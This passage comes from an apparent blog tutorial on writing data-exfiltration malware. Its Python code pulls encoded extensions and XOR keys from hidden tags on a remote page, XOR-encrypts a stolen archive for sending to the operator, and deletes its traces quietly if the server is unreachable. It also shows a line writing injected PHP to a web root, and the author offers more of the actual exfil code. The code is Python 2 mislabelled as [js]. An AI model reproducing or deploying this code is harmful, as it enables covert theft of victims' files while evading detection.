        print "writing code: %s to /var/www/injectcode.php" % (randomstring)
        time.sleep(300)
[/js]

Functions to do the grab and the XOR in the script that becomes your binary. Don't forget your imports!
[js]
import base64
import os
import re
import sys
import urllib2

codeaddy = 'yer address'

def extensiongrab():
    html_content = urllib2.urlopen(codeaddy).read()
    # the base64'd extension sits between the DIU tags on the page
    matches = re.findall('<DIU>(.*?)</DIU>', html_content)
    if len(matches) != 0:
        ext = base64.b64decode(matches[0])
        print "extension decoded as: %s" % (ext)
        return ext
    else:
        return '.log'

def codegrab():
    # add in error handling so that if the website isn't found it exits and
    # cleans up quietly
    html_content = urllib2.urlopen(codeaddy).read()
    # the XOR code digits sit between the UID tags on the page
    matches = re.findall('<UID>(.*?)</UID>', html_content)
    if len(matches) != 0:
        return matches
    else:
        os.remove(ziptimestamp)  # ziptimestamp: the archive built elsewhere
        sys.exit()
[/js]

In this example, ziptimestamp is the binary file to encode. The for loop XORs each byte of the file with one code, then moves on to the next XOR code, up to the 6 XORs dictated by the creation of a string 6 to 12 digits long. For example, 012456 becomes 0x01 0x24 0x56, or 3 XOR codes applied in order. YES, I could up the randomness by using the full hex values A through F, but I was running into type issues when converting to base16 for the XOR encoding, so I just left it 0 through 9. So if the mal binary pulled that code and sent the file off to you, to decode you would apply the codes in reverse order: 0x56 -> 0x24 -> 0x01, and then you would have your plaintext files of whatever type you dictated.
[js]
def crypt(matches, ziptimestamp):
    randomstring = ''.join(matches)
    numxors = len(randomstring) / 2
    n = 2
    xorcodes = [randomstring[i:i+n] for i in range(0, len(randomstring), n)]

    for x in range(0, numxors):
        xorcodes[x] = '0x' + xorcodes[x]
        # apply this XOR code to every byte of the file, then write it back
        b = bytearray(open(ziptimestamp, 'rb').read())
        dacode = long(xorcodes[x], 16)
        for i in range(len(b)):
            b[i] ^= dacode
        open(ziptimestamp, 'wb').write(b)
[/js]

Send me an email if you have any comments or want more of the actual code that performed the exfil. ~ keyzer at s0ze . com